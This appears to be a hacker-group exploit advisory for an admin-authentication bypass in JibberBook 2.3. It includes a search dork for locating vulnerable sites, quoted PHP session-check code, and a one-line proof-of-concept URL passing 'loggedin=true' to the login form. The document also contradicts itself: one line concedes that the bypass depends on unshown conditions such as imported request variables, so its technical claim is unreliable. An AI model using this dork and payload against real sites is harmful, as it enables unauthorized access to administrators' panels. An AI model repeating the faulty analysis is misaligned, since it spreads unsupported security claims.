################################################# # Exploit Title : jibberbook Bypass Admin Vulnerability # # Author : IrIsT.Ir & Sec4Ever.com # # Discovered By : L3b-r1'z # # Home : http://IrIsT.Ir & http://Sec4Ever.com # # P Blob : http://L3b-r1z.com/ # # Software Link : http://jibberbook.com/ # # Security Risk : High # # Version : 2.3 # # Tested on : win\XP # # Dork : allintext: "JibberBook created by chromasynthetic | Powered by MooTools, HTML Purifier, and Akismet" # # 1) Script # 2) Info Vulnerability # 3) P0c # # ################################################# # # 1) Script: # JibberBook allows visitors to leave a comment or anything else, such as how much they like the website :) # or any message for the site admin. # # ################################################# # # 2) Info Vulnerability : # This exploit allows an attacker to log into the admin panel without entering a username or password. # Look into the file index.php in jibberbook-2.3\admin : # # require_once('inc/secure.php'); # require_once('../inc/includes.php'); # includes(array('admin/actions/load.php', 'admin/actions/transformxml.php')); # # $_SESSION['referer'] = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; # require_once('inc/header.php'); # ?> # It requires a file named secure.php; let's check it :) : # # session_start(); # if (!isset($_SESSION['admin'])) # { # if (is_file(realpath('login_form.php'))) { # $url = 'http://' . $_SERVER['HTTP_HOST'] . dirname($_SERVER['REQUEST_URI'] . 'x') . '/login_form.php'; # } else { # $url = 'http://' . $_SERVER['HTTP_HOST'] . dirname(dirname($_SERVER['REQUEST_URI'] . 'x')) . '/login_form.php'; # } # header("Location: $url"); # exit(); # } else { # $loggedin = true; # } # # The file does not have any real security here :P. # Look below the header() call: in the else branch we have $loggedin = true, which means that if the visitor is not admin they are redirected to login_form.php, # otherwise $loggedin = true and the admin is sent to the admin panel :). # Note that $loggedin is only assigned after the $_SESSION['admin'] check, so a request parameter can reach it only if the script imports request variables (for example with register_globals enabled); the advisory does not show that part, so the access control actually rests on the session check and on how login_form.php handles request input. 
# # ################################################# # # 3) p0c : # # Site.Com/Admin/Login_form.php?loggedin=true # ################################################# # # # Special Thx To : Irist Team & Sec4Ever Team . # ################################################# # # # Greet'z : b0x, Virus-Ra3ch, Damane2011, Hacker-1420, The Injector, N4ss1m, hacker-1420. # Sec4ever, B07 M4S73R, Stalk3r, Hacker-Dz, Mr.XKILLeR, The Viper, Th3 Killer Dz. # Over-X <3, And All My Friends. # ################################################# -- Proud To Be Lebanese :D I Will Miss You My Friends : b0x, Virus-Ra3ch, Damane2011, Hacker-1420, The Injector, N4ss1m, Sec4ever, B07 M4S73R, Stalk3r, Hacker-Dz, Mr.XKILLeR, The Viper, Th3 Killer Dz, Over-X <3, And All My Friends. Sec4ever.com.